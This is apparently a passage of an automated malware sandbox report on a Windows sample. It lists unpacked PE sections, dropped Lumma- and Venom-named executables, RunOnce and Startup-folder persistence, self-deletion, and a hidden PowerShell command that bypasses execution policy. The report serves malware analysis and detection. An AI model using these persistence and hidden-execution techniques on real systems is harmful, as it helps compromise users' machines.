                  Source: Binary string: BitLockerToGo.pdb source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323520937.0000023B60790000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C000800000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C0008EC000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323973343.0000023B60750000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: powershell.exe, 00000020.00000002.2624078104.0000020A687F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A687AD000.00000004.00000800.00020000.00000000.sdmp, lm.exe.32.dr
                  Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.5.dr
                  Source: Binary string: BitLockerToGo.pdbGCTL source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323520937.0000023B60790000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C000800000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C0008EC000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323973343.0000023B60750000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: powershell.exe, 00000020.00000002.2624078104.0000020A687F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A687AD000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000000.2595768222.0000000000402000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 00000025.00000002.3739220721.0000000000402000.00000002.00000001.01000000.00000016.sdmp, lm.exe, 00000026.00000000.2596792457.0000000000402000.00000002.00000001.01000000.00000017.sdmp, lm.exe, 00000026.00000002.2884350710.0000000000402000.00000002.00000001.01000000.00000017.sdmp, vm.exe, 0000002B.00000002.2871363883.0000000000402000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 0000002B.00000000.2753936670.0000000000402000.00000002.00000001.01000000.00000016.sdmp, lm.exe.32.dr

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\7Y18r(14).exeUnpacked PE file: 4.2.7Y18r(14).exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.gigug:W;.nigabu:R;.hud:W;.rsrc:R;sup:EW; vs .text:EW;
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeUnpacked PE file: 5.2.IXDaI.exe.ba0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeUnpacked PE file: 17.2.IXDaI.exe.ee0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
                  Source: 37.2.vm.exe.4e40000.1.raw.unpack, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                  Source: 43.2.vm.exe.28c0000.1.raw.unpack, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
                  Source: initial sampleStatic PE information: section where entry point is pointing to: sup
                  Source: 7Y18r(14).exeStatic PE information: section name: .gigug
                  Source: 7Y18r(14).exeStatic PE information: section name: .nigabu
                  Source: 7Y18r(14).exeStatic PE information: section name: .hud
                  Source: 7Y18r(14).exeStatic PE information: section name: sup
                  Source: IXDaI.exe.4.drStatic PE information: section name: .aspack
                  Source: IXDaI.exe.4.drStatic PE information: section name: .adata
                  Source: Uninstall.exe.5.drStatic PE information: section name: EpNuZ
                  Source: MyProg.exe.5.drStatic PE information: section name: PELIB
                  Source: MyProg.exe.5.drStatic PE information: section name: Y|uR
                  Source: SciTE.exe.5.drStatic PE information: section name: u
                  Source: B552.exe.14.drStatic PE information: section name: .xdata
                  Source: ftejced.14.drStatic PE information: section name: .gigug
                  Source: ftejced.14.drStatic PE information: section name: .nigabu
                  Source: ftejced.14.drStatic PE information: section name: .hud
                  Source: ftejced.14.drStatic PE information: section name: sup
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_00401CD1 push ecx; ret 4_2_00401CD2
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_00401C91 push 00000076h; iretd 4_2_00401C93
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_00402E96 push B92A2F4Ch; retf 4_2_00402E9B
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_00601D38 push ecx; ret 4_2_00601D39
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_00601CF8 push 00000076h; iretd 4_2_00601CFA
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_00602EFD push B92A2F4Ch; retf 4_2_00602F02
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_006E6763 push edx; ret 4_2_006E6764
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_006E87E1 push FFFFFFFBh; iretd 4_2_006E87F7
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 5_2_00BA1638 push dword ptr [00BA3084h]; ret 5_2_00BA170E
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 5_2_00BA2D9B push ecx; ret 5_2_00BA2DAB
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 5_2_00BA6014 push 00BA14E1h; ret 5_2_00BA6425
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 5_2_00BA600A push ebp; ret 5_2_00BA600D
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_00401CD1 push ecx; ret 16_2_00401CD2
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_00401C91 push 00000076h; iretd 16_2_00401C93
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_00402E96 push B92A2F4Ch; retf 16_2_00402E9B
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_00517881 push FFFFFFFBh; iretd 16_2_00517897
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_00515803 push edx; ret 16_2_00515804
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_00671D38 push ecx; ret 16_2_00671D39
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_00672EFD push B92A2F4Ch; retf 16_2_00672F02
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_00671CF8 push 00000076h; iretd 16_2_00671CFA
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 17_2_00EE1638 push dword ptr [00EE3084h]; ret 17_2_00EE170E
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 17_2_00EE600A push ebp; ret 17_2_00EE600D
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 17_2_00EE2D9B push ecx; ret 17_2_00EE2DAB
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 17_2_00EE6014 push 00EE14E1h; ret 17_2_00EE6425
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C08C0DD5 push eax; ret 28_2_00007FF7C08C0DFD
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C08C0DC0 push eax; ret 28_2_00007FF7C08C0DFD
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C08C0DFE push eax; retf 28_2_00007FF7C08C0E1D
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C08C0D55 push eax; ret 28_2_00007FF7C08C0DFD
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C08C2E88 push E85D50DDh; ret 28_2_00007FF7C08C2EF9
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C08C00BD pushad ; iretd 28_2_00007FF7C08C00C1
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C09B23E1 push 8B485F90h; iretd 28_2_00007FF7C09B23E6
                  Source: 7Y18r(14).exeStatic PE information: section name: .text entropy: 7.471980252090664
                  Source: 7Y18r(14).exeStatic PE information: section name: sup entropy: 6.934340827164694
                  Source: IXDaI.exe.4.drStatic PE information: section name: .text entropy: 7.81169422100848
                  Source: Uninstall.exe.5.drStatic PE information: section name: EpNuZ entropy: 6.934502658443004
                  Source: MyProg.exe.5.drStatic PE information: section name: Y|uR entropy: 6.934291252229405
                  Source: SciTE.exe.5.drStatic PE information: section name: u entropy: 6.934650171158212
                  Source: ftejced.14.drStatic PE information: section name: .text entropy: 7.471980252090664
                  Source: ftejced.14.drStatic PE information: section name: sup entropy: 6.934340827164694

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dllJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeJump to dropped file
                  Source: C:\Users\user\Desktop\7Y18r(14).exeFile created: C:\Users\user\AppData\Local\Temp\IXDaI.exeJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dllJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B552.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F6D9.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\753F.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ftejcedJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ftejcedJump to dropped file

                  Boot Survival

                  barindex
                  Source: Yara matchFile source: 37.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 43.2.vm.exe.28c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 37.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 43.2.vm.exe.28c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vm.exe PID: 392, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vm.exe PID: 5776, type: MEMORYSTR
                  Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#6110_8yUscnjrUYJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbsJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs
                  Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#6110_8yUscnjrUYJump to behavior
                  Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#6110_8yUscnjrUYJump to behavior
                  Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#6110_8yUscnjrUYJump to behavior
                  Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#6110_8yUscnjrUYJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\7y18r(14).exeJump to behavior
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ftejced:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 799
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess information set: NOOPENFILEERRORBOX
